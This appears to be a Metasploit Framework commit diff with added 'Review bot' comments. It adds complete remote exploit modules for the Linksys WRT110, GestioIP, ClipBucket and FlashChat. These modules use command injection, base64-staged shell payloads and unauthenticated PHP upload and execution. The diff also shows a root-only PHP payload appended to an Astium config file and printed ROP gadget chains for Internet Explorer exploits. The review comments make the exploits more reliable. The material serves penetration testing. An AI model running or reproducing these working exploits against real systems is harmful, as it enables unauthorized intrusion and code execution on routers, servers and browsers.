phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');" phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root, # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
# else during the config reload it might happen that an extra shell is spawned as the apache user. # else during the config reload it might happen that an extra shell is spawned as the apache user.
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");" phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');" phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");" phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
phppayload << "fclose($f);" phppayload << "fclose($f);"
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 120) }, 120)
# If we don't get a 200 when we request our malicious payload, we suspect # If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. # we don't have a shell, either.
if res and res.code != 200 if res and res.code != 200
print_error("#{peer} - Unexpected response...") print_error("#{peer} - Unexpected response...")
end end


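--- /dev/null
+++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb
@@ -0,0 +1,121 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStagerEcho
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Linksys WRT110 Remote Command Execution',
+'Description' => %q{
+The Linksys WRT110 consumer router is vulnerable to a command injection
+exploit in the ping field of the web interface.
+},
+'Author' =>
+[
+'Craig Young', # Vulnerability discovery
+'joev', # msf module
+'juan vazquez' # module help + echo cmd stager
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2013-3568'],
+['BID', '61151'],
+['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
+],
+'DisclosureDate' => 'Jul 12 2013',
+'Privileged' => true,
+'Platform' => ['linux'],
+'Arch' => ARCH_MIPSLE,
+'Targets' =>
+[
+['Linux mipsel Payload', { } ]
+],
+'DefaultTarget' => 0,
+))
+register_options([
+OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
+OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
+OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
+OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
+], self.class)
+end
+def check
+begin
+res = send_request_cgi({
+'uri' => '/HNAP1/'
+})
+rescue ::Rex::ConnectionError
+return Exploit::CheckCode::Safe
+end
+if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+def exploit
+test_login!
+execute_cmdstager
+end
+# Sends an HTTP request with authorization header to the router
+# Raises an exception unless the login is successful
+def test_login!
+print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
+res = send_auth_request_cgi({
+'uri' => '/',
+'method' => 'GET'
+})
+if not res or res.code == 401 or res.code == 404
+fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
+else
+print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
+end
+end
+# Run the command on the router
+def execute_command(cmd, opts)
+send_auth_request_cgi({
+'uri' => '/ping.cgi',
+'method' => 'POST',
+'vars_post' => {
+'pingstr' => '& ' + cmd
+}
+})
+Rex.sleep(1) # Give the device a second
+end
+# Helper methods
+def user; datastore['USERNAME']; end
+def pass; datastore['PASSWORD'] || ''; end
+def send_auth_request_cgi(opts={}, timeout=nil)
+timeout ||= datastore['TIMEOUT']
+opts.merge!('authorization' => basic_auth(user, pass))
+begin
+send_request_cgi(opts, timeout)
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+end
+end
+end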
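Review bot: `check` returns `Exploit::CheckCode::Safe` from its `rescue ::Rex::ConnectionError`, which tells the operator the target was confirmed not vulnerable when nothing was tested; return `Exploit::CheckCode::Unknown` there and keep `Safe` for the case where an HNAP response arrived but did not match. `send_auth_request_cgi` mutates the caller's `opts` with `merge!`, so the Authorization header leaks into any hash the caller reuses; `opts = opts.merge('authorization' => basic_auth(user, pass))` avoids that. `check` and `test_login!` also use `and`/`or`/`if not` for boolean logic where `&&`/`||`/`unless` are the idiomatic forms.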


@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Neal Poole', # Vulnerability discovery 'Neal Poole', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>' # Metasploit module 'joev' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>


@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "",
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def use_auth
!(pass.nil? or pass.empty?)
end
def exploit
pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8)
options = {
'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
'encode_params' => false,
'vars_get' => {
'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
'hostname' => "fds",
'client_id' => "1",
'ip_version' => ""
}
}
if use_auth
options.merge!('authorization' => basic_auth(user,pass))
end
res = send_request_cgi(options)
if res and res.code == 401
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
end
end
end
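Review bot: `send_request_cgi` can return nil when nothing comes back, and the only check in `exploit` is `if res and res.code == 401`, so an unreachable or silent target ends the run with no message; the same line also misspells PASSWORD as "PASSOWRD". A two-line replacement covers both: `fail_with(Failure::Unknown, "#{rhost}:#{rport} - No response from server") unless res` followed by `fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSWORD") if res.code == 401`. Separately, `use_auth` relies on `or` inside the parentheses; `pass && !pass.empty?` says the same thing without depending on `or` precedence.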


@ -10,6 +10,11 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
# handle module misnomer
require 'msf/core/module/deprecated'
include Msf::Module::Deprecated
deprecated Date.new(2013, 12, 7), 'exploit/linux/http/linksys_wrt110_cmd_exec'
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho include Msf::Exploit::CmdStagerEcho
@ -23,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Craig Young', # Vulnerability discovery 'Craig Young', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # msf module 'joev', # msf module
'juan vazquez' # module help + echo cmd stager 'juan vazquez' # module help + echo cmd stager
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Local
'Author' => 'Author' =>
[ [
'Todd C. Miller', # Vulnerability discovery 'Todd C. Miller', # Vulnerability discovery
'joev <jvennix[at]rapid7.com>', # Metasploit module 'joev', # Metasploit module
'juan vazquez' # testing/fixing module bugs 'juan vazquez' # testing/fixing module bugs
], ],
'References' => 'References' =>


@ -0,0 +1,118 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "ClipBucket Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in ClipBucket version 2.6 and lower.
The script "/admin_area/charts/ofc-library/ofc_upload_image.php" can be used to
upload arbitrary code without any authentication. This module has been tested
on version 2.6 on CentOS 5.9 32-bit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gabby', # Vulnerability Discovery, PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://packetstormsecurity.com/files/123480/ClipBucket-Remote-Code-Execution.html' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Clipbucket 2.6', {}]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
], self.class)
end
def uri
return target_uri.path
end
def check
# Check version
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "")
})
if res and res.code == 200 and res.body =~ /ClipBucket version (\d+\.\d+)/
version = $1
else
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version #{version} detected")
if version > "2.6"
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
peer = "#{rhost}:#{rport}"
payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
print_status("#{peer} - Uploading payload [ #{payload_name} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"),
'headers' => { 'Content-Type' => 'text/plain' },
'vars_get' => { 'name' => payload_name },
'data' => payload.encoded
})
# If the server returns 200 we assume we uploaded the malicious
# file successfully
if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
end
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name)
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, probably the exploit failed")
end
end
end
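Review bot: `check` decides with `version > "2.6"`, a String comparison, so a later "2.10" sorts below "2.6" and would be reported Vulnerable; compare with `Gem::Version.new(version) > Gem::Version.new("2.6")` instead. The `return Exploit::CheckCode::Safe` after the if/else is unreachable and can be dropped, and `$1` reads more clearly as `Regexp.last_match(1)`. In `exploit`, `fail_with(Failure::None, ...)` labels a failed upload as "no failure"; `Failure::UnexpectedReply` describes what happened. The local `peer = "#{rhost}:#{rport}"` in both methods duplicates the `peer` helper that the FlashChat module in this same commit uses unqualified.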


@ -0,0 +1,147 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "FlashChat Arbitrary File Upload",
'Description' => %q{
This module exploits a file upload vulnerability found in FlashChat
versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload
feature in order to upload malicious PHP files without authentication
which results in arbitrary remote code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'x-hayben21', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['OSVDB', '98233'],
['EDB', '28709']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on FlashChat version 6.0.8
[ 'Generic (PHP Payload)', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 04 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to FlashChat', '/chat/'])
], self.class)
end
#
# Checks if target is running FlashChat versions 6.0.2, 6.0.4 to 6.0.8
#
def check
uri = normalize_uri(target_uri.path, '')
res = send_request_raw({'uri' => uri})
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
version = res.body.scan(/<title>FlashChat v([\d\.]+)/).flatten[0] || ''
if version.empty?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version found: #{version}")
if version =~ /6\.0\.(2|4|5|6|7|8)/
return Exploit::CheckCode::Vulnerable
elsif version <= "6.0.8"
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Uploads our malicious file
# Stolen from havalite_upload_exec.rb
#
def upload(base)
fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{fname}\"")
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'upload.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
end
return fname
end
#
# Executes our uploaded malicious file
# Stolen from havalite_upload_exec.rb
#
def exec(base, payload_fname)
res = send_request_raw({
'uri' => normalize_uri(base, 'temp', payload_fname)
})
if res and res.code == 404
fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
end
end
def exploit
base = target_uri.path
# upload
print_status("#{peer} - Uploading malicious file...")
fname = upload(base)
# register the file to clean
register_files_for_cleanup(fname)
# exec
print_status("#{peer} - Executing #{fname}...")
exec(base, fname)
end
end
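Review bot: `def exec(base, payload_fname)` redefines `exec` on this class and shadows `Kernel#exec` for anything inside the module that might call it; a name such as `execute_payload` avoids the trap, with the call in `exploit` updated to match. In `check`, `version <= "6.0.8"` is a String comparison, so "6.0.10" sorts below "6.0.8" and is reported Detected; `Gem::Version.new(version) <= Gem::Version.new("6.0.8")` gives a numeric ordering. `if not res` in `check` and `upload` is idiomatically `unless res`.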


@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -62,39 +63,9 @@ class Metasploit4 < Msf::Exploit::Remote
end end
def get_payload(t) def get_payload(t)
p = '' alignment = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
rop = return p
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
p << rop
p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
p << payload.encoded
p
end end
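Review bot: The new body of `get_payload` assigns `p` only to `return p` on the next line; the method is a single expression, `generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})`, so the temporary and the explicit `return` can go. The earlier hunk's `include Msf::Exploit::RopDb` is what supplies `generate_rop_payload`; a one-line comment on the include noting that the msvcrt chain now comes from the ROP database would help anyone diffing this against the modules that still inline their chains.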


@ -135,100 +135,27 @@ class Metasploit3 < Msf::Exploit::Remote
# No rop. Just return the payload. # No rop. Just return the payload.
return code if t['Rop'].nil? return code if t['Rop'].nil?
# Make post code execution more stable
code << rand_text_alpha(12000)
msvcrt_align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
java_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
rop_payload = ''
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
case t.name case t.name
when 'IE 8 on Windows XP SP3' when 'IE 8 on Windows XP SP3'
rop_gadgets = rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
when 'IE 8 on Windows Server 2003' when 'IE 8 on Windows Server 2003'
rop_gadgets = rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end end
else else
rop_gadgets = rop_payload = generate_rop_payload('java', java_align + code)
[
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0xffffffff,
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30 # ptr to 'push esp # ret ' [msvcr71.dll]
# rop chain generated with mona.py
].pack("V*")
end end
rop_payload = rop_gadgets rop_payload
case t['Rop']
when :msvcrt
rop_payload << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
else
rop_payload << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
end
rop_payload << code
rop_payload << rand_text_alpha(12000) unless t['Rop'] == :msvcrt
return rop_payload
end end
def load_exploit_html(my_target, cli) def load_exploit_html(my_target, cli)
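Review bot: In the rewritten `get_payload` body, the inner `case t.name` under `when :msvcrt` has no `else`, so an `:msvcrt` target whose name is neither of the two listed leaves `rop_payload` as `''` and the method returns an empty string without complaint, where the old code would have failed on a nil `rop_gadgets`; add `else fail_with(Failure::NoTarget, "No msvcrt ROP chain for #{t.name}")` inside that case. The same silent-empty path exists in the next file's `get_payload` (the hunk ending at `rop_payload = generate_rop_payload('java', code)`). `get_payload` itself starts before this hunk.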


@ -117,76 +117,22 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t, cli) def get_payload(t, cli)
rop_payload = '' rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop'] case t['Rop']
when :msvcrt when :msvcrt
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
chain = '' rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3' if t.name == 'IE 8 on Windows XP SP3'
chain = rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
elsif t.name == 'IE 8 on Windows Server 2003' elsif t.name == 'IE 8 on Windows Server 2003'
junk = rand_text_alpha(4).unpack("V")[0].to_i rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
nop = make_nops(4).unpack("V")[0].to_i
chain =
[
0x77bb2563, # POP EAX # RETN
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
junk,
0x77bb0c86, # XCHG EAX,ESI # RETN
0x77bc9801, # POP EBP # RETN
0x77be2265, # ptr to 'push esp # ret'
0x77bb2563, # POP EAX # RETN
0x03C0990F,
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
0x77bb48d3, # POP EBX, RET
0x77bf21e0, # .data
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
0x77bbfc02, # POP ECX # RETN
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
0x77bd8c04, # POP EDI # RETN
0x77bd8c05, # ROP NOP (-> edi)
0x77bb2563, # POP EAX # RETN
0x03c0984f,
0x77bdd441, # SUB EAX, 03c0940f
0x77bb8285, # XCHG EAX,EDX # RETN
0x77bb2563, # POP EAX # RETN
nop,
0x77be6591 # PUSHAD # ADD AL,0EF # RETN
].pack("V*")
end end
rop_payload = chain + algin + payload.encoded
else else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << payload.encoded code << p
code << rand_text_alpha(12000) code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code) rop_payload = generate_rop_payload('java', code)
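Review bot: The comment `# Extra junk in the end to make sure post code execution is stable.` now sits above `p = payload.encoded`, but the only line that appends the 12000-byte `rand_text_alpha` is in the `else` (java) branch, so the comment describes a different line; move it beside `code << rand_text_alpha(12000)`. `rop_payload = ''` is assigned twice, once before the `case` and again inside `when :msvcrt`, and one of the two is redundant. As in the previous file, the msvcrt branch has no fallback when `t.name` matches neither condition and quietly yields an empty chain. `get_payload` continues past the end of this hunk.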


@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "Micorosft Internet Explorer SetMouseCapture Use-After-Free", 'Name' => "Microsoft Internet Explorer SetMouseCapture Use-After-Free",
'Description' => %q{ 'Description' => %q{
This module exploits a use-after-free vulnerability that currents targets Internet This module exploits a use-after-free vulnerability that currents targets Internet
Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.
@ -49,6 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
[ 'CVE', '2013-3893' ], [ 'CVE', '2013-3893' ],
[ 'OSVDB', '97380' ], [ 'OSVDB', '97380' ],
[ 'MSB', 'MS13-080' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ],
